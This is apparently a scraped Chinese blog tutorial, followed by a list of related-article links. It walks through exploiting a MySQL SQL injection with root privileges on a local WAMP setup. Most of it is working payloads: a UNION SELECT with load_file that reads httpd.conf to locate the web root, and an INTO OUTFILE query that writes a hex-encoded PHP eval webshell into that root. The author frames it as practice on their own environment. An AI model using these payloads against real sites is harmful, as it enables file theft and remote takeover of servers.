首先我们的找到一个有注入的站:这里我用自己搭建的环境表示;大家不要乱来

http://localhost/pentest/sql/sql_injection_get.php?id=1

发现是root权限,我们尝试直接写马

首先要找到网站的主目录:

数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\

进行判断,服务器可能为wampserver简易版,httpd.conf文件在D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf

http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,3 load_file(‘D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf‘) from user--+

如果这样不成功,建议将目录转换为hex编码进行:即 load_file(0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)

找到了网站目录:D:/wamp/www

我们尝试写:

http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E into outfile ‘D:/wamp/www/xx.php‘ from user --+

<?php eval($_POST[‘cmd‘]);?>的hex编码:0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E

然后访问:http://localhost/xx.php

原文:http://www.cnblogs.com/BloodZero/p/4432549.html

mysql注入写一句话_Mysql注入root权限直接写一句话马相关推荐

  1. mysql root 被锁_MySQL的root权限密码忘记的解决办法

    今天是我第一次用MySQL这个软件,我在自己的系统中安装了一个(OS X ),在虚拟机中的windows XP 环境下安装了一个,我希望能在我自己的系统下远程连接到XP 中的MySQL,于是XP环境下 ...

  2. mysql root 权限注入_Mysql注入root权限直接写一句话马

    标签: 首先我们的找到一个有注入的站:这里我用自己搭建的环境表示:大家不要乱来 http://localhost/pentest/sql/sql_injection_get.php?id=1 发现是r ...

  3. mysql进行mof提权_MySQL数据库Root权限MOF方法提权研究

    MySQL数据库Root权限MOF方法提权研究 MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Wi ...

  4. mysql root 提权_mysql以ROOT权限提权方法

    mysql .x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内. 按照上面的方法,我们需要知道web ...

  5. mysql 远程登陆设置_MYSQL远程登录权限设置

    Mysql默认关闭远程登录权限,如下操作允许用户在任意地点登录: 1. 进入mysql,GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY ...

  6. linux通过java获取root权限_通过可写文件获取Linux root权限的5种方法

    Linux系统中,全部都是以文件形式存在的,包括目录.设备都是有权限的,共有读.写.可执行三种.管理员为文件设置好权限后,应该要考虑哪些Linux用户会被允许和限制上述的三个权限. 通过可写脚本进行r ...

  7. linux中root权限找tmp路径,通过可写文件获取 Linux root 权限的 5 种方法-tmp文件

    Linux系统中,全部都是以文件形式存在的,包括目录.设备都是有权限的,共有读.写.可执行三种.管理员为文件设置好权限后,应该要考虑哪些Linux用户会被允许和限制上述的三个权限. 通过可写脚本进行r ...

  8. mysql注入找路径_MySQL注入(示例代码)

    ---------------------------------------------------------------------------------------------------- ...

  9. mysql注入技巧原理_MySQL注入技巧总结

    0x00 介绍 以下所有技巧都只在mysql适用,因为它太灵活了. 0x01 MYSQl灵活的语法 1 MySQL语法以及认证绕过 注释符: #,-- X(X为任意字符)/*(MySQL-5.1);% ...

最新文章

  1. python(1):数据类型/string/list/dict/set等
  2. 按钮自动居中布局_CSS布局技巧
  3. AI算法连载02:概率论基础
  4. 关于 C++ 中输入输出的猜想
  5. 回公司无聊和小冰聊天,很好奇她到底怎么想的
  6. Django链接Mysql 8.0 出现错误(1045:Access denied for user ‘root‘@‘localhost‘ (using password: NO) 的一种解决方法
  7. php移动文件的函数 move_uploaded_file()和copy
  8. android客户端功能,人人网Android版手机客户端功能详解
  9. 如何在EF中实现left join(左联接)查询
  10. 50件关于学霸与学渣的小事
  11. YXC | 蓝牙耳机晶振怎么选?
  12. 【rabbitMQ】真就一篇就够!!
  13. JAVA NIO实现客户端与服务端通信
  14. openssl 交叉编译 armv7内核
  15. dcs常用的冗余方式_dcs试题
  16. 真 OO无双之真乱舞书 序言
  17. 个人征信报告解析(机构版)
  18. ArcGIS Pro基于遥感影像使用深度学习地物识别评估植被健康情况(教程)
  19. Linux命令之关机命令
  20. 20-交换技术——Trunk技术详解

热门文章

  1. SVN Error:请求的名称有效并且在数据库中找到,但是它没有相关的正确的数据来被解析...
  2. c#组元(Tuple)的使用
  3. WCF4.0 –- RESTful WCF Services (1) (入门)
  4. C#动态生成html页
  5. SQL语句中用Parameters有什么好处
  6. 处理unsigned相减错误(BIGINT UNSIGNED value is out of range)
  7. php soap实例讲解
  8. Redis与Memcached的比较
  9. PHP之composer切换国内源
  10. Linux的Vi编辑器